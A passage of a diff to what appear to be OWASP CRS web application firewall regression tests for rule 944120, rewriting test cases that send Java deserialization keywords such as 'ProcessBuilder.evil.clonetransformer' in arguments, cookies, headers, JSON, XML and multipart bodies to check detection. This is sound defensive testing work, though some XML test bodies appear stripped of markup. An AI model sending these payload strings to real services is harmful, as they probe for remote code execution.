method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944120] + - test_id: 4 desc: "Cookie name includes keyword ProcessBuilder.evil.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: 
"en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: ProcessBuilder.evil.clonetransformer=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-5 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: ProcessBuilder.evil.clonetransformer=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944120] + - test_id: 5 desc: "Request header test includes keyword ProcessBuilder.evil.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: ProcessBuilder.evil.clonetransformer - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-6 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: ProcessBuilder.evil.clonetransformer + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944120] + - test_id: 6 desc: "XML element includes keyword 
ProcessBuilder.evil.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "value" - output: - no_log_contains: "id \"944120\"" - - test_title: 944120-7 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "value" + output: + log: + no_expect_ids: [944120] + - test_id: 7 desc: "XML attribute name includes keyword ProcessBuilder.evil.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - no_log_contains: "id \"944120\"" - - test_title: 944120-8 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + 
no_expect_ids: [944120] + - test_id: 8 desc: "XML attribute value includes keyword ProcessBuilder.evil.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-9 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944120] + - test_id: 9 desc: "XML element value includes keyword ProcessBuilder.evil.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.clonetransformer" - output: - log_contains: "id \"944120\"" - - test_title: 944120-10 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: 
"application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.clonetransformer" + output: + log: + expect_ids: [944120] + - test_id: 10 desc: "Nested XML element value includes keyword ProcessBuilder.evil.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.clonetransformer" - output: - log_contains: "id \"944120\"" - - test_title: 944120-11 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.clonetransformer" + output: + log: + expect_ids: [944120] + - test_id: 11 desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=ProcessBuilder.evil.clonetransformer" - output: - log_contains: "id \"944120\"" - - test_title: 944120-12 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.clonetransformer" + output: + log: + expect_ids: [944120] + - test_id: 12 desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"ProcessBuilder.evil.clonetransformer\"}" - output: - log_contains: "id \"944120\"" - - test_title: 944120-13 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"ProcessBuilder.evil.clonetransformer\"}" + output: + log: + expect_ids: [944120] + - test_id: 13 desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: 
"HTTP/1.0" - data: "{\"ProcessBuilder.evil.clonetransformer\": \"test\"}" - output: - log_contains: "id \"944120\"" - - test_title: 944120-14 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"ProcessBuilder.evil.clonetransformer\": \"test\"}" + output: + log: + expect_ids: [944120] + - test_id: 14 desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/json + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - {"ProcessBuilder.evil.clonetransformer": "test"} - 
-----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-15 + {"ProcessBuilder.evil.clonetransformer": "test"} + -----------------------------thisissparta-- + output: + log: + expect_ids: [944120] + - test_id: 15 desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/json + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - {"ProcessBuilder.evil.clonetransformer": "test"} - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-16 + {"ProcessBuilder.evil.clonetransformer": "test"} + -----------------------------thisissparta-- + output: + log: + expect_ids: [944120] + - test_id: 16 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.clonetransformer" stages: - - stage: - 
input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/xml + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - ProcessBuilder.evil.clonetransformer - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-17 + ProcessBuilder.evil.clonetransformer + -----------------------------thisissparta-- + output: + log: + expect_ids: [944120] + - test_id: 17 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: 
"HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/xml + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - ProcessBuilder.evil.clonetransformer - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-18 + ProcessBuilder.evil.clonetransformer + -----------------------------thisissparta-- + output: + log: + expect_ids: [944120] + - test_id: 18 desc: "Argument test includes keyword ProcessBuilder.evil.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=ProcessBuilder.evil.forclosure" - output: - log_contains: "id \"944120\"" - - test_title: 944120-19 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" 
+ version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.forclosure" + output: + log: + expect_ids: [944120] + - test_id: 19 desc: "Argument name includes keyword ProcessBuilder.evil.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.forclosure=test" - output: - log_contains: "id \"944120\"" - - test_title: 944120-20 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.forclosure=test" + output: + log: + expect_ids: [944120] + - test_id: 20 desc: "Cookie test includes keyword ProcessBuilder.evil.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=ProcessBuilder.evil.forclosure - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-21 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=ProcessBuilder.evil.forclosure + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944120] + - test_id: 21 desc: "Cookie name includes keyword ProcessBuilder.evil.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: ProcessBuilder.evil.forclosure=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-22 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: ProcessBuilder.evil.forclosure=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944120] + - test_id: 22 desc: "Request header test includes keyword ProcessBuilder.evil.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: 
ProcessBuilder.evil.forclosure - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-23 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: ProcessBuilder.evil.forclosure + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944120] + - test_id: 23 desc: "XML element includes keyword ProcessBuilder.evil.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "value" - output: - no_log_contains: "id \"944120\"" - - test_title: 944120-24 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "value" + output: + log: + no_expect_ids: [944120] + - test_id: 24 desc: "XML attribute name includes keyword ProcessBuilder.evil.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - no_log_contains: "id \"944120\"" - - test_title: 944120-25 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + no_expect_ids: [944120] + - test_id: 25 desc: "XML attribute value includes keyword ProcessBuilder.evil.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-26 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944120] + - test_id: 26 desc: "XML element value includes keyword ProcessBuilder.evil.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - 
headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.forclosure" - output: - log_contains: "id \"944120\"" - - test_title: 944120-27 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.forclosure" + output: + log: + expect_ids: [944120] + - test_id: 27 desc: "Nested XML element value includes keyword ProcessBuilder.evil.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.forclosure" - output: - log_contains: "id \"944120\"" - - test_title: 944120-28 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.forclosure" + output: + log: + expect_ids: [944120] + - test_id: 
28 desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=ProcessBuilder.evil.forclosure" - output: - log_contains: "id \"944120\"" - - test_title: 944120-29 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.forclosure" + output: + log: + expect_ids: [944120] + - test_id: 29 desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"ProcessBuilder.evil.forclosure\"}" - output: - log_contains: "id \"944120\"" - - test_title: 944120-30 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + 
